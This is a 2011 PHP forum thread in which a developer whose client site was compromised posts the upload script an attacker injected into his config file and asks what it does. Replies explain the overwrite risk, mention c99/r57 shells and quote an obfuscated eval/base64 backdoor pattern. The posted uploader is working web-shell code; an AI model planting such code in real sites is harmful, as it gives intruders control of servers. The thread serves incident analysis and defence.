PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
 
Loading
It is currently Thu Oct 17, 2019 6:44 am

All times are UTC - 5 hours




Post new topic Reply to topic  [ 10 posts ] 
Author Message
 Post subject: My website hacked.
PostPosted: Thu Oct 13, 2011 4:59 am 
Offline
Forum Newbie

Joined: Thu Oct 13, 2011 4:43 am
Posts: 2
Hello,

I have been a web developer for about 10 years. I was asked by a friend to make a site for him because his previous site was hacked and messed up. Now i think i keep my security pretty tight and was positive something like that wouldnt happen to my site. The dumb thing that i did was keep the old site on the server (friend asked me to because there were some pictures there that she wanted later). I just moved it to a whole new directory and renamed it to old_site or something.

Now one day i find out that something is wrong. First there is an upload script written in one of my main config files and secend someone has allready uploaded something.
My main questions are:
1) Im pretty sure the attack came somehow through the old_site that i kept (now deleted) but even so how is it possible to directly edit my config file?
2) I was able to remove the upload script and the uploaded file but i dont know what did the uploaded file do? Im going to post the script uploaded, can anyone guess what was its purpouse?

The upload script in my config file:
Syntax: [ Download ] [ Hide ]
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
else { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
}
?>
õ
 


The uploaded file: http://justpaste.it/jbw (alot of code so i copyd it elsewhere)

Would be thankful for any help :)


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Thu Oct 13, 2011 5:17 am 
Offline
DevNet Master
User avatar

Joined: Sun Feb 15, 2009 12:08 pm
Posts: 2794
Location: .za
The script copies a file; copy() overwrites the destination file if it exists so the attacker could have overwritten a system file with their own copy.

_________________
“Don’t worry if it doesn’t work right. If everything did, you’d be out of a job.” - Mosher’s Law of Software Engineering


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Thu Oct 13, 2011 8:21 am 
Offline
DevNet Resident
User avatar

Joined: Sun Sep 03, 2006 5:19 am
Posts: 1579
Location: Sofia, Bulgaria


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Thu Oct 13, 2011 9:06 am 
Offline
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
I agree. The most common thing is a back door shell script is installed somewhere like c99 or r57. These tools are surprisingly efficient at compromising your server. Here's a tutorial on some of the things to look for in the log files.

http://25yearsofprogramming.com/blog/2010/20100315.htm

Yours looks like plain text, but a lot of these nasties start in an encrypted form of some sort and look like:
Syntax: [ Download ] [ Hide ]
<? eval(gzinflate(base64_decode('FJ3HjuvKkkV/pWd9AQ7oHfDwLuiN6K3ISYOe ov.......on and on'))); ?>

By the way, you should hire Mordred to audit your system. There could easily be a hole your new code that allows this upload. I always like to blame the other guy's code, but you don't want egg on your face if it happens again.


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Fri Oct 14, 2011 8:17 am 
Offline
Forum Newbie

Joined: Thu Oct 13, 2011 4:43 am
Posts: 2


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Fri Oct 14, 2011 9:28 am 
Offline
DevNet Resident
User avatar

Joined: Sun Sep 03, 2006 5:19 am
Posts: 1579
Location: Sofia, Bulgaria
@Donald, I have a standing offer for 3 free hours of whitebox audit, check this:

@Eric!: Thanks for the promotion man ;)


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Fri Oct 14, 2011 9:58 am 
Offline
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
You should start a website with your services and feedback from your free audits, including some sample results, your fees, etc. (Also so we can all sit around and try to hack it. :) )


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Mon Oct 17, 2011 7:25 am 
Offline
DevNet Resident
User avatar

Joined: Sun Sep 03, 2006 5:19 am
Posts: 1579
Location: Sofia, Bulgaria
Haha. No :)
Most of the issues are boooring. "Didn't escape", "Didn't check the extension" ... boooring. I've seen some cool ones though, have to dig them up.

---
Ha, found one, it was a fun game:
I remember the Skeleton project having a funny homebrew escaping solution that I exploited, but I can't find my post about it :/


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Thu Nov 10, 2011 1:04 am 
Offline
Forum Newbie

Joined: Wed Nov 09, 2011 8:32 am
Posts: 5
Is someone upload php script?
For example:
I can upload a PHP file by you script
The php code is:
ad.php:
<?php
phpinfo();
?>
then I can run this script in order to get information about you server


Top
 Profile  
 
 Post subject: Re: My website hacked.
PostPosted: Thu Nov 10, 2011 11:00 am 
Offline
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
@mordred eval() is definitely full of fun exploits. I was think more along the lines of you distilling the examples into something more security focused and using them to illustrate how many programmers never even realize how many holes they open up. You could use this as part of an on-line portfolio to help demonstrate your skills and how often confident programmers unknowingly open up a can of worms...yada yada. So why the haha no?


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 10 posts ] 

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group